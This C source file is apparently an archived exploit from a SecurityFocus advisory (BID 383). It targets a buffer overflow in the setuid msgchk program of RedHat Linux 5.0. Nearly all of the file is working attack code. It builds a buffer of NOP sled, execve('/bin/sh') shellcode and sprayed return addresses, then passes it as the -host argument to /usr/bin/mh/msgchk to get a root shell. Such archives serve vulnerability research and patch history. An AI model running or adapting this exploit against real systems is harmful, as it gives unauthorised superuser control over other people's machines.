// source: https://www.securityfocus.com/bid/383/info
//
// Similar to the mh vulnerability, a buffer overflow exists in the version of msgchk shipped with RedHat Linux 5.0. The vulnerability allows a user to execute arbritrary commands as root to compromise superuser access.
//
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 1018
#define NOP 0x90
char shellcode[] =
""\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b""
""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd""
""\x80\xe8\xdc\xff\xff\xff/bin/sh"";
unsigned long get_sp(void) {
__asm__(""movl %esp,%eax"");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
char *args[5];
char jorge[]="""";
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) {
printf(""Can't allocate memory.\n"");
exit(0);
}
addr = get_sp() - offset;
printf(""Using address: 0x%x\n"", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4) {
buff[i]=addr & 0xFF;
buff[i+1]=(addr >> 8) & 0xFF;
buff[i+2]=(addr >> 16) & 0xFF;
buff[i+3]=(addr >> 24) & 0xFF;
}
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
args[0]=""/usr/bin/mh/msgchk"";
args[1]=""-host"";
args[2]=buff;
args[3]=NULL;
execve(args[0],args,NULL);
}